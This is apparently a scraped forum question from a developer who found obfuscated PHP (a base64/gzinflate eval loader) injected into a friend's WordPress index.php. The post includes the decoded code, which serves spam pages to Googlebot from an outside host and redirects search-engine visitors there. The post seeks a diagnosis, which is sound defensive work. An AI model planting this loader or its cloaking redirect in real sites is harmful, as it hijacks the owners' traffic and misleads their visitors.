Lemme preface this with I’m a python backend dev and I have almost zero php and wordpress experience. I’m going by intuition and dead reckoning mostly. My friend calls me in a panic and tells me her website has started showing this error at the top of the page:
`Notice: Undefined index: HTTP\_REFERER in REDACTED/index.php(9) : eval()’d code on line 15`
I dug into the web server and found the \`index.php\` file in question, which looked like this:
“`
<?php function OFgP($nGtfQ)
{
$nGtfQ=gzinflate(base64_decode($nGtfQ));
for($i=0;$i<strlen($nGtfQ);$i++)
{
$nGtfQ[$i] = chr(ord($nGtfQ[$i])-1);
}
return $nGtfQ;
}eval(OFgP(“tVTRbpswFH2Hr3ARqkGlkDxM6pZmUxXRtFKXdITsYWmGqOcQr4ApmDVd22/ftQlNk03bNGmIB9v33nPOPb6AEDy6WdKErlAfGd7nK292cvgpPvzeOXw9P7iKtnYvYlcR7N0k5gemZ/R087am5T1AmNHEDz76wQwH/oepPwmjaXCO5z1NZwurEiW8VpPsGBUTNIsLd5Wlhm0/6BolS46GVJyylA54LmgurO2sHl0x0dOf1mis4JW1oTwLw8toCrvoZOiPQjx3EB5ynqT0mgtso71+Hy3itKKSDBBYVVGxlmOj/X1UgBNRFguytBpTnHVQFmgmMEKLuwKXQhRvPG9R8uxrkbuEZx7hN+WCQbNe56jTvSmPul2viBNaucWyeGe4DaprPMKyVW8o9WfjSWjM7R7QKTckp9qovrUnaF32/kIo9qxE9SiZH5+X7k35eB8vOVfH1yxP1CKPv9FSrmyPYQcBuuApv6Plro2Bf+oHfoDntv0vbrX68XFF4JrE2y+c1Bn45aacxILxvP/XziU8p3eNddiFS89aES6GiTj21gz42ScERlG4ZtC9scyMhn44w3WN53t9w7AfNP2/StzQ/UKnkqlJZYs6J5Jrd6zMukzXxrcpEVRVorLwAvKihIqINMkVtm2kJlRF2lOY1Z8yG1w5SUg61FSRJaQSCEQsZ8JS02cKllFeC4i8koZqKg4TwAuBLChx0GAaXIwv5Rd+4aAW9zd5gR9Og1EYnIwmMFsO6tp/AB6MRyN/EIbn7/3xNASOtaZG4G6vCoeuKJEgGykk5RVtj550raSiLnO0XQ6/FPQD”));?>
<?php
/**
* Front to the WordPress application. This file doesn’t do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define( ‘WP_USE_THEMES’, true );
/** Loads the WordPress Environment and Template */
require __DIR__ . ‘/wp-blog-header.php’;
“`
Looks like some obfuscation, which made me raise an eyebrow, but for all I know, some plugin generated this. Here’s the decloaked code:
“`
$regex = “/^\/[A-Za-z0-9]+\_[A-Za-z0-9]+\/[A-Za-z0-9\_]+\.gao+$/”;
$query = $_SERVER[‘REQUEST_URI’];
if(strstr($query,”sitemap.xml”)){
echo GetFileContent(“sitemap.xml”);exit;
}
if(stripos($_SERVER[‘HTTP_USER_AGENT’], ‘Googlebot’) !== false){
if(isset($query) && preg_match($regex,$query)){
$str = GetFileContent(“http://fromjpn.com/cokrfirst/0801kr811/pages.php?”.$query.”|”.$_SERVER[“HTTP_HOST”]);
echo $str;
exit;
}
}
if(preg_match(‘/(google.com|google.co.kr|yahoo.com|bing.com|naver.com)/i’, strtolower($_SERVER[‘HTTP_REFERER’]))){
if(isset($query) && preg_match($regex,$query)){
echo ‘<script>document.location=(“http://fromjpn.com/cokrfirst/0801kr811/gonews.php?’.trim($query).'”);</script>’;
exit;
}else{
}
}
if($_GET[‘uu’]!=””){
echo ‘<script>document.location=(“http://fromjpn.com/cokrfirst/0801kr811/gonews.php?’.trim($_GET[‘uu’]).'”);</script>’;
exit;
}
function GetFileContent($url){
if(function_exists(‘file_get_contents’)) {
$file_contents = file_get_contents($url);
} else {
$ch = curl_init();
$timeout = 5;
curl_setopt ($ch, CURLOPT_URL, $url);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
$file_contents = curl_exec($ch);
curl_close($ch);
}
return $file_contents;
}
“`
I visited `fromjpn.com` in a sandbox and it redirects to some sort of spammy/weeb looking hangul site. Is this doing anything actually for the functionality of the site, or is this some sort of exploit that somehow got injected into the `index.php` file?
[ad_2]